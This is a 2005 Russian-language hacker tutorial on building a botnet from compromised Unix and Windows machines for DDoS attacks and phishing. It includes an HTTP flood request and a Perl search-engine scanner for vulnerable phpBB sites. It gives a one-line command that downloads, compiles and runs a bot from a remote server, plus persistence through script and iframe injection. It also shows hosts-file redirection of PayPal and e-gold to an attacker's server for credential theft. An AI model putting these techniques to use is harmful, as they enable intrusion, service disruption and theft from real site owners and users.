Создаем свой боевой ботнет

Системы защиты постоянно совершенствуются, программисты стают более опытными. Теперь допускается все меньше и меньше широко известных ошибок.

[пролог]
Интернет разростается с огромной силой. Хакеру становится все труднее искать уязвимости. Админы используют для защиты разработки крутейших security експертов. Узнаешь свои мысли? На самом деле в интернете полно уязвимостей, вот толку от них мало. Ну, это еще как посмотреть Вот, представь себе ситуацию, тебя достал какой-то сетевой ублюдок, ты хочешь его наказать. Сегодня мы поговорим о создании собственного боевого ботнета.
Итак, что же такое "бот". Непосвященному человеку сразу в память бросаются тупые противники в компьютерных играх, которых ты перестреляешь за две минуты. Да, это отчасти так. В нашем случае "бот" - это программа которая исполняет заложеные в нее команды. Вроди ничего особенного. Кто-то возразит: "Я, мол, в пять лет такое написал, нажимаешь на кнопочку и программа,оля-ля,закрывается" Забудем детство. Мы все знаем что возможности кодинга безграничны, и использовать его можно для добра и зла. Мы, конечно, ведь всегда используем наши разработки с благими намериниями. "Ботнет" - это множество ботов собраных в одном центре, которые синхронно исполняют команды владельца. Боты, кстати, в основном нацелены больше на Windows машины. Тут тебе и пароли можно своровать, и сокс поставить, и винт форматнуть Я отойду от правил и расскажу как создать ботнет из nix машин. Основная функция нашего бота- это огранизация DDOS атак. Это идеальный способ использовать широкие каналы nix серверов. Подсчитаем. Сервер который нужно "завалить" стоит на 100Mb канале. Тоесть, 10-20 ботов стоящих на таком же канале завалят сервер во мгновенье. Если от одного сервера можно прикрытся фаерволом, то от большего количества ботов, увы, спасения нет
[Пишем бота]
Листинг примерного бота ты найдешь по линку в конце статьи. Разберемся немного с кодом. (эээ, Дрим опять все контролируется через IRC? Через WEB круче!). Кстати, контроль через IRC был выбран через его интерактивность. Допустим, мне захочется порутать локальными ядерными эксплоитами парочку серверов в ботнете. Я просто исполню команду SH uname -a средствами бота и моментально найду нужный мне комп. Потом также исполнив команду в IRC клиенте, загружу бекдор и получу интерактивный шелл для дальнейших действий. Возможности безграничны. Ты скажешь - реализовать такой контроль можно и через WEB, но зачем перезагружать страничку и тратить трафик? Гороздо удобнее наблюдать все в реальном времени (хотя, при ботнете больше 1000 ботов, можно позаботится о удобстве интерфейса -прим. здравого рассудка). Многие думают, что огранизация DDOS дело очень сложное. Вот пример кода обычной атаки:

GET /server.org HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Windows 5.2 i686)\r\nHost: server.org:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n

Тоесть, мы просто посылаем запрос серверу заставляя на него ответить. Причем посылаем его пока сервер не ляжет от нехватки трафика или процесорного времени. Но разве ты ограничешся одними nix ботами, нужно ведь создавать и виндовий ботнет, например, на основе AgoBot. Для этого можно создать некий код для бота который будет сканировать на предмет lsasl/dcom уязвимостей машины которые коннектятся к серверу на котором установлен бот.
[Создаем ботнет]
На самом деле создать ботнет очень легко. Для этого нам понадобится найти уязвимость в любом web скрипте. Найденая уязвимость должна позволять исполнять команды shell интерпритататора. Когда найдешь уязвимость, обрати внимание на название бажного файла, его заголовок, название уязвимой системы. Теперь, с помощью этих данных, нужно составить хороший поисковый запрос. К примеру, возьмен всем известную уязвимость в phpBB<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") or next;
print $sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n";
@resu = <$sock>;
close($sock);

Далее, проводим фильтрацию результатов и запускаем эксплоит. Сам эксплоит должен выполнять команду запуска нашего бота.

wget http://_server.org/bot.c;gcc bot.c -o bash;chmod +x bash;./bash;

Здесь можно увидеть сразу две проблемы. wget и gcc может не оказаться или их использование будет запрещено. Здесь нам помогут качалки fech,curl и get или консольный броузер lynx, либо же, использовать ftp протокол. Его реализация сложнее, но и плюс в том, что ftp то есть везде Что касается компилятора, то можно просто скомпилировать бинарник на своем шелле и надеятся что с совместимость все будет ок, или же переписать бота на интерпритированые языки - Perl или PHP. У каждого способа свои достоинства и недостатки, какой использовать, выбор твой. Я привык использовать захваченый сервер по максимуму. Ведь бот на nix сервере продержится лишь до первой перезагрузки машины. Из этой ситуации есть один интересный выход. Бот будет искать интерпритируемые файлы (.pl,.php) доступные на запись и добавлять в них код скачки и запуска бота. Или можно создать еще виндовый ботнет. Реализуется это также легко. Здесь нужна уязвимость в обозревателе интернета(Internet Explorer,Opera,Mozilla) которая приводит к скачке и запуска нужного файла. Далее создается inframe запись загружающая наш вредоносный код. Эта запись добавляется во все index файлы(или во все где есть html код, все зависит от твоей наглости). С такой работой отлично справляется небольшой скриптик Haz, который ты найдешь также в архивчике. Багтрак заполнен записями о критичных уязвимостях в Internet Explorer, так что в нашем подчинении будет и ботнет на Windows системах (его плюсы я упоминал выше). Все, запускай нашего поискового червячка на скоростном шелле, выпей кофе(пиво, водка, томатный сок) заходи на IRC канал указаный в свойствах бота и наблюдай количество своих подчиненных. В заключение хочу передать привет всем кто меня знает и пожелать тебе удачи. Не попадайся.
ХХХХХХХХХХХХХХХХХХХХХХХХХХХХ

Уязвимость в phpBB актуальна до 2.0.16 версии, хотя разработчики утверждают что они ее исправили в 2.0.11

http://_exploits.ath...oits/data/bots/
http://_www.honeynet.org


Фишинг
Очень удобно использовать ботов в качестве организации фишинга. Для этого нужны специальные заточеные под фишинг страницы эмулирующие нужный нам сайт и хороший хостинг, выделенный сервер или VDS. Такие страницы можно сделать самому, купить, найти в сети. Выбор огромен. Чаще всего фишинг организовывается на сайты: e-gold.com,paypal.com,citybank.com,usbank.com,ebay.c om и другие, так или иначе, связаные с электронной комерцией. Далее Windows бот переписывает файл \system32\drivers\etc\hosts добавляя в него ip адрес вашего сервера и присваивая к нему альяс нужного вам сайта. Формат файла таков:
102.54.94.97 e-gold.com
102.54.94.97 paypal.com
Тоесть, наберя в броузере сайты e-gold.com и paypal.com пользователь попадает на наш сервер ничего не подозревая. В свою очередь на сервере фишера в httpd.conf добавляются записи о соответствующих доменах.
<VirtualHost *:*>
DocumentRoot "/home/e-gold.com/www"
ServerName "www.e-gold.com"
ServerAlias "e-gold.com" "www.e-gold.com"
</VirtualHost>
Разумется в строке броузера будет всем знакомый адрес e-gold.com и даже продвинутый юзер залогинится на сайт ничего не заподозрив. Для полноты картины, скажу, что если пользователь использует прокси сервер то этот способ работать не будет

Боты на любой вкус
Agobot/Phatbot/Forbot/XtremBot
Это лучшее семейство ботов. Написаны на С++. Имеют множество функций защиты от обнаружения и насчитывают более 500 модификаций благодаря четко выраженой модульной структуре.
SDBot/RBot/UrBot/UrXBot
Очень популярные на даный момент боты для проведения DDOS атак. Имеют множество дополнительный функций. Таких как открытие Sock4, кейлоггер, автоматический сканер lsass и dcom уязвимостей. Также имеет функцию перенаправления запросов к сайтам антивирусных компаний на локальный сервер путем редактирования \system32\drivers\etc\hosts и установкой небольшего поддельного web сервера на 80 порт.
DSNX Bots
Этот бот может проводить DDOS атаки, сканирование портов и еще некоторые мелочи.
Q8 Bots
Отличный бот под nix системы. Отличается своим компактным кодом (27 Кб, состоит из одного файла) и неплохой функциональностью. Умеет динамично обновлятся путем скачивания и запуска нового файла. Хорошо реализует основные реализации DDOS (SYN-flood, UDP-flood). Умеет выполнять системные команды. Также неплохо маскируется в системе.
kaiten
Также неплохой бот под Unix/Linux системы. Умеет открывать удаленный шелл на захваченом сервере.
Perl-based bots
Это очень маленькие боты написаные на Perl. Используются для DDOS атак на Unix-based системах.

Все упомянутое здесь:
http://_dreamerz.newmail.ru/bots.rar

Статья имеет большой уклон в сторону хакинга, так что непонятно - спрашивайте.

Copyright © 2005 DreAmeRz specially for verified.ru